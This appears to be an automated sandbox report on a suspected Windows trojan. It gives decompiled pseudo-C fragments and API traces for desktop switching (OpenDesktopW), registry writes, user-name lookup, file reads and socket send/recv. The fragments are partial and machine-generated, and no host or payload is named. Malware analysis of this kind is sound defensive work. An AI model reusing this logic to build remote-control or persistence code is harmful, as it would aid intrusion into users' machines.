    • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040CAE4
      • Part of subcall function 004189F0: HeapFree.KERNEL32(?,00000000,00000000,?,00020000,00000000,00000000,0000FDE9,00000001,?,00000000,00000001), ref: 00418A5C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeapName$FileModuleUser
    • String ID:
    • API String ID: 1194275196-3916222277
    • Opcode ID: 348f0bc5c6b19061968c28490614f2a89fb13ef815b0d3cdef9dde92904bacfd
    • Instruction ID: c8e6262bda34ec06b99c229ea51e3cc8dd4e96b7d08c9d905e172eaa573f1141
    • Opcode Fuzzy Hash: 348f0bc5c6b19061968c28490614f2a89fb13ef815b0d3cdef9dde92904bacfd
    • Instruction Fuzzy Hash: 9D11E97128538099E324DB149986BF7B7D89FC1700F080A2FB9C4AB2D2D7B8D949C71E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E00426C50() {
    				long _v0;
    				int _v4;
    				long _v8;
    				char _v668;
    				char _v796;
    				char _v896;
    				short _v908;
    
    				if(( *0x42e8f8 & 0x00000004) == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
    					return OpenInputDesktop();
    				}
    				E0041D150( &_v796);
    				E00416E10(0x42eb70,  &_v668,  *0x42e904,  &_v896, 0);
    				return OpenDesktopW( &_v908, _v8, _v4, _v0);
    			}











    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00426C67
      • Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
    • OpenDesktopW.USER32(?,?,?,?), ref: 00426CBB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: DesktopFromObjectOpenSingleStringWait
    • String ID: pB
    • API String ID: 216972675-3059159000
    • Opcode ID: 99138766b19f612f3a886d3c9f6c18f41d736e775cd0fe2d9c5575123fe09194
    • Instruction ID: b17eb2865fddb33ced454ab6c76f5136ffce983a0157157bfb71dead6b8550c4
    • Opcode Fuzzy Hash: 99138766b19f612f3a886d3c9f6c18f41d736e775cd0fe2d9c5575123fe09194
    • Instruction Fuzzy Hash: 1EF0C8B56043009BD325DB95DD49FAB73ACEB84304F44C96EF554832A0EB34A908CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A5C0(void* __edi) {
    				char _v348;
    				char _v488;
    				void* __esi;
    				void* _t3;
    				void* _t11;
    
    				_t11 = 0;
    				if(__edi != 0 &&  *0x42eb64 > 1) {
    					E0041D1B0( &_v488);
    					E00412640( &_v348, __edi, 0x74);
    					_t11 = E00416610(0x42e704, 3, __edi, 0x74);
    				}
    				_t3 =  *0x42e718;
    				ReleaseMutex(_t3);
    				CloseHandle(_t3);
    				return _t11;
    			}









    APIs
    • ReleaseMutex.KERNEL32(?,?,00000000), ref: 0041A60D
    • CloseHandle.KERNEL32(?), ref: 0041A614
      • Part of subcall function 00416610: RegCreateKeyExW.ADVAPI32(80000001,0042E720,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00416633
      • Part of subcall function 00416610: RegSetValueExW.ADVAPI32(00000074,?,00000000,?,00000074,?), ref: 00416658
      • Part of subcall function 00416610: RegCloseKey.ADVAPI32(00000000), ref: 00416669
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Close$CreateHandleMutexReleaseValue
    • String ID: B
    • API String ID: 2820475446-2386870291
    • Opcode ID: f8dae9de48923e6aeb684e078815865e2f706662ccc734a1dcc659831f45ce99
    • Instruction ID: 40ac7b7ec7862ba636a4e254e2e02dcc9e9ad155a2fa53d1baafd584cfe54921
    • Opcode Fuzzy Hash: f8dae9de48923e6aeb684e078815865e2f706662ccc734a1dcc659831f45ce99
    • Instruction Fuzzy Hash: C8F02731E812606AD730A735FD05FCA2B689B81704F48002BB948A31A1CB7D6585C66E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E00409C10(intOrPtr __edi, void* __eflags) {
    				char _v1;
    				char _v2;
    				char _v6;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t11;
    				intOrPtr _t15;
    				intOrPtr _t16;
    
    				_t16 = __edi;
    				_v2 = 0;
    				if(E00414B90(1, __edi, 0,  &_v1) == 0) {
    					L5:
    					_t15 = _v2;
    					L6:
    					if(_t16 != 0xffffffff) {
    						__imp__#22(_t16, 2);
    						__imp__#3(_t16);
    					}
    					return _t15;
    				}
    				_t11 = _v1;
    				if(_t11 != 5) {
    					if(_t11 == 4) {
    						_v6 = E00409910(__edi);
    					}
    					goto L5;
    				}
    				_t15 = E00408E30(__edi);
    				goto L6;
    			}












    APIs
      • Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
      • Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01
    • shutdown.WS2_32(?,00000002), ref: 00409C59
    • closesocket.WS2_32(00000000), ref: 00409C60
      • Part of subcall function 00408E30: getsockname.WS2_32 ref: 00408E57
      • Part of subcall function 00408E30: send.WS2_32(?,?,00000002,00000000), ref: 00408EF2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: closesocketgetsocknamerecvselectsendshutdown
    • String ID: p0u
    • API String ID: 2490758381-1742372003
    • Opcode ID: 71e3522ff757223584397774523be0b5670f76a930a6a28377ab2ea6a4090753
    • Instruction ID: e69e2262a9a857875bbc1c846421c30207f7fa369dc4313419db9e7e763becae
    • Opcode Fuzzy Hash: 71e3522ff757223584397774523be0b5670f76a930a6a28377ab2ea6a4090753
    • Instruction Fuzzy Hash: 90E0E57140C10069E6212B149D89AFB67DD8BD6354F04461FF4A6A72D6C7388D469266
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • shutdown.WS2_32(00000000,00000002), ref: 004152D8
    • closesocket.WS2_32(00000000), ref: 004152DF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: closesocketshutdown
    • String ID: p0u
    • API String ID: 572888783-1742372003
    • Opcode ID: 165ecc4e025a529bb96640957f92f0761924c95a63f633aa32a4d19160e000fa
    • Instruction ID: 181046a8456e24b48acba9caec537d767fa61d6a7dad923b4ffd5351d5b66c5d
    • Opcode Fuzzy Hash: 165ecc4e025a529bb96640957f92f0761924c95a63f633aa32a4d19160e000fa
    • Instruction Fuzzy Hash: 42B09232602820B7CB1127685E0DADE3714AB82321B100360F973B90F0673809468A9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0040B060(WCHAR* __edx, void* __edi, void* __ebp, void* __eflags) {
    				char _v2104;
    				char _v2112;
    				void* _v2116;
    				void* _v2120;
    				intOrPtr _v2124;
    				void* _v2128;
    				long _v2132;
    				long _v2136;
    				intOrPtr _v2140;
    				long _v2144;
    				void* _v2148;
    				signed int _v2152;
    				void* __ebx;
    				void* __esi;
    				void* _t55;
    				void* _t60;
    				signed int _t68;
    				void* _t69;
    				void* _t73;
    				intOrPtr* _t75;
    				long _t77;
    				void* _t79;
    				void* _t83;
    				char* _t84;
    				void* _t87;
    				void* _t95;
    				signed int _t96;
    				void* _t99;
    				void* _t101;
    				long _t104;
    				void* _t108;
    				long _t109;
    				void* _t110;
    				char* _t111;
    				signed int _t114;
    				signed int _t118;
    				void** _t119;
    
    				_t99 = __edi;
    				_t119 =  &_v2148;
    				_t83 = 0;
    				_v2144 = 0;
    				if(E00418040(0, __edx,  &_v2128) == 0) {
    					return 0;
    				} else {
    					_t108 = _v2128;
    					_t114 = E00411430(_v2124, _t108,  &_v2148, 1, 0);
    					_v2152 = _t114;
    					if(_t108 != 0) {
    						VirtualFree(_t108, 0, 0x8000);
    					}
    					_t55 = _v2120;
    					if(_t55 != 0) {
    						CloseHandle(_t55);
    					}
    					if(_t114 == 0xffffffff) {
    						return _t83;
    					} else {
    						_t95 = _t114 - (0x38e38e39 * _t114 >> 0x20 >> 1) + (0x38e38e39 * _t114 >> 0x20 >> 1) * 8;
    						_push(_t99);
    						if(_t95 != 0) {
    							L8:
    							_t87 = _v2148;
    						} else {
    							_t15 = _t95 + 0x24; // 0x24
    							E004240C0(_t15,  &_v2128);
    							E004240C0(0x25,  &_v2112);
    							_t68 = 0;
    							_t96 = 0;
    							_v2140 = 0;
    							if(_t114 != 0) {
    								while(1) {
    									_t87 = _v2148;
    									_t104 =  *((intOrPtr*)(_t87 + _t68 * 4));
    									_v2132 = _t104;
    									if(_t104 == 0 ||  *_t104 == 0) {
    										break;
    									}
    									_t110 =  *(_t87 + 4 + _t68 * 4);
    									_v2116 = _t110;
    									if(_t110 == 0 ||  *_t110 == 0) {
    										break;
    									} else {
    										_t118 =  *(_t87 + 8 + _t68 * 4);
    										if(_t118 == 0 ||  *_t118 == 0) {
    											break;
    										} else {
    											if(E00411B20(_t68 | _t96 | 0xffffffff, _t118, _t96 | 0xffffffff, _t96) == 0) {
    												L29:
    												_push(_t110);
    												_push(_t104);
    												_t111 =  &_v2104;
    												_t73 = E00411D70(_t72, 0x838, _t111,  &_v2112);
    												if(_t73 == 0xffffffff) {
    													goto L34;
    												} else {
    													_push(_t73);
    													_t84 = _t111;
    													_t75 = E00410E60( &_v2144, _t84);
    													_t119 = _t84;
    													 *_t75 =  *_t75 + _t75;
    													if(_t75 == 0) {
    														goto L34;
    													} else {
    														_t77 = _v2144 + 9;
    														_t96 = _t118;
    														_v2144 = _t77;
    														if(_t77 < _v2140) {
    															_t68 = _v2144;
    															continue;
    														} else {
    															_t83 = _v2148;
    															goto L8;
    														}
    													}
    												}
    											} else {
    												_push(_t118);
    												_t79 = E00411D70( &_v2128, 0x838,  &_v2104,  &_v2128);
    												_t119 =  &(_t119[2]);
    												if(_t79 == 0xffffffff) {
    													L34:
    													_t83 = 0;
    													goto L8;
    												} else {
    													_push(_t79);
    													if(E00410E60( &_v2144,  &_v2104) == 0) {
    														goto L34;
    													} else {
    														_t104 = _v2136;
    														_t110 = _v2120;
    														goto L29;
    													}
    												}
    											}
    										}
    									}
    									goto L40;
    								}
    								_t69 = _v2144;
    								if(_t69 != 0) {
    									HeapFree( *0x42e6d4, 0, _t69);
    									_t87 = _v2148;
    								}
    								_t83 = 0;
    							} else {
    								goto L8;
    							}
    						}
    						_t109 = _v2136;
    						if(_t87 != 0 && _t109 != 0) {
    							_t101 = _t87;
    							do {
    								_t60 =  *(_t101 + _t109 * 4 - 4);
    								_t109 = _t109 - 1;
    								if(_t60 != 0) {
    									HeapFree( *0x42e6d4, 0, _t60);
    								}
    							} while (_t109 != 0);
    							if(_t101 != 0) {
    								HeapFree( *0x42e6d4, _t109, _t101);
    							}
    						}
    						return _t83;
    					}
    				}
    				L40:
    			}









































    APIs
      • Part of subcall function 00418040: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418061
      • Part of subcall function 00418040: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418075
      • Part of subcall function 00411430: HeapFree.KERNEL32(?,-00000004,00000000), ref: 004114D4
    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,00000001,00000000), ref: 0040B0A9
    • CloseHandle.KERNEL32(?,?,00000001,00000001,00000000), ref: 0040B0B8
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000001,00000001,00000000), ref: 0040B12A
    • HeapFree.KERNEL32(?,?,00000000,?,?,00000001,00000001,00000000), ref: 0040B13D
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$Heap$File$CloseCreateHandleSizeVirtual
    • String ID:
    • API String ID: 2389364983-0
    • Opcode ID: fac159570df7226fff70e317c8295474b059019319a9be6bc5d7294f1c3a799e
    • Instruction ID: 738deeaa71a2111c705e03e4577929242107141a57f72d0824cb3cb4b324c82a
    • Opcode Fuzzy Hash: fac159570df7226fff70e317c8295474b059019319a9be6bc5d7294f1c3a799e
    • Instruction Fuzzy Hash: 2D510E316043059BC720DE19DC40A6FB7A8EB84754F44066EB994AB3D1EB38EC0A87DA
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • HeapFree.KERNEL32(?,?,00000000,00000000,?), ref: 00411A06
    • HeapAlloc.KERNEL32(?,00000008,?), ref: 00411A21
    • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 00411A32
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00411AD5
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$AllocFree
    • String ID:
    • API String ID: 1379380650-0
    • Opcode ID: d3fcbb3d26129e2615d2e9ec1dff6688171a272c8c6eca272db7835b662cefbe
    • Instruction ID: efe8cfb9891cde2f04f359c0ca46ce458e47275684ad433623618f2cc334728f
    • Opcode Fuzzy Hash: d3fcbb3d26129e2615d2e9ec1dff6688171a272c8c6eca272db7835b662cefbe
    • Instruction Fuzzy Hash: F941E5746153019BDB349F95D980BB777A4EF91384F44443BEA818A3B0EB78DC86C39A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • HeapFree.KERNEL32(?,?,00000000,00000000,?,00000000,00411DE0,00000000,?,?,?,00000000,?,00412C21,?), ref: 00410BBD
    • HeapAlloc.KERNEL32(?,00000008,?,00000000,?,00000000,00411DE0,00000000,?,?,?,00000000,?,00412C21,?), ref: 00410BD9
    • HeapReAlloc.KERNEL32(?,00000008,00000000,?,00000000,?,00000000,00411DE0,00000000,?,?,?,00000000,?,00412C21,?), ref: 00410BEB
    • wvnsprintfW.SHLWAPI(?,-00000200,?,?), ref: 00410C08
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Alloc$Freewvnsprintf
    • String ID:
    • API String ID: 630057495-0
    • Opcode ID: 06b151a10dca0020f576444ca280bcff8727da00dad94cb59d292c431d72672e
    • Instruction ID: 97b3807e9e53e5b58170f0607886a35fdc9c8b13c719680ff7e1dba9e78ccd1e
    • Opcode Fuzzy Hash: 06b151a10dca0020f576444ca280bcff8727da00dad94cb59d292c431d72672e
    • Instruction Fuzzy Hash: 232160716083069FD724CFA4D884FA773A8FB54308F50892EE911CB290EB74E9D5C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CloseHandle.KERNEL32(?), ref: 0040AB4A
    • HeapFree.KERNEL32(?,00000000,?), ref: 0040AB66
      • Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752
    • HeapFree.KERNEL32(?,00000000,?,?), ref: 0040AB85
    • HeapFree.KERNEL32(?,00000000,00000000,?), ref: 0040ABD0
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap$CloseHandle
    • String ID:
    • API String ID: 1910495013-0
    • Opcode ID: 6df2fcd46d12ed536a77d3c01bec24b7c1a15628f583977b178cf0ea54117bc2
    • Instruction ID: 3596076b850d2e2ae7ba5a12881e59a0d1e49e9bba0e01a461f9c5e57939d9a3
    • Opcode Fuzzy Hash: 6df2fcd46d12ed536a77d3c01bec24b7c1a15628f583977b178cf0ea54117bc2
    • Instruction Fuzzy Hash: B3218E757002028BC738DF1AD980B6773B9EB98315B94403EA60997291D738F952CB69
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • EnterCriticalSection.KERNEL32(0042EDE8,00000001,00425105), ref: 00423768
    • HeapFree.KERNEL32(?,00000000,?), ref: 0042378C
      • Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,0040700E,0000FDE9,?), ref: 00410AE4
      • Part of subcall function 00410AA0: HeapAlloc.KERNEL32(?,00000008,-00000004,?,?,0040700E,0000FDE9,?), ref: 00410B05
      • Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000001,?,?,0040700E,0000FDE9,?), ref: 00410B34
    • LeaveCriticalSection.KERNEL32(0042EDE8), ref: 004237A1
    • LeaveCriticalSection.KERNEL32(0042EDE8,00000000,000000FF), ref: 004237BC
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$ByteCharHeapLeaveMultiWide$AllocEnterFree
    • String ID:
    • API String ID: 2861695539-0
    • Opcode ID: d04aef97d035244799662fa1aea145fd7b02c311b4b25832fa72f04e93b0ca42
    • Instruction ID: 69d95d11ad96412be80f573ec36b351f8c0b905190464251c5bce2533d94b870
    • Opcode Fuzzy Hash: d04aef97d035244799662fa1aea145fd7b02c311b4b25832fa72f04e93b0ca42
    • Instruction Fuzzy Hash: 55F058747903219BDB24AB22BD08B8A3664BB01761FC8022AF401E72B0C7B88802C74D
    Uniqueness

    Uniqueness Score: -1.00%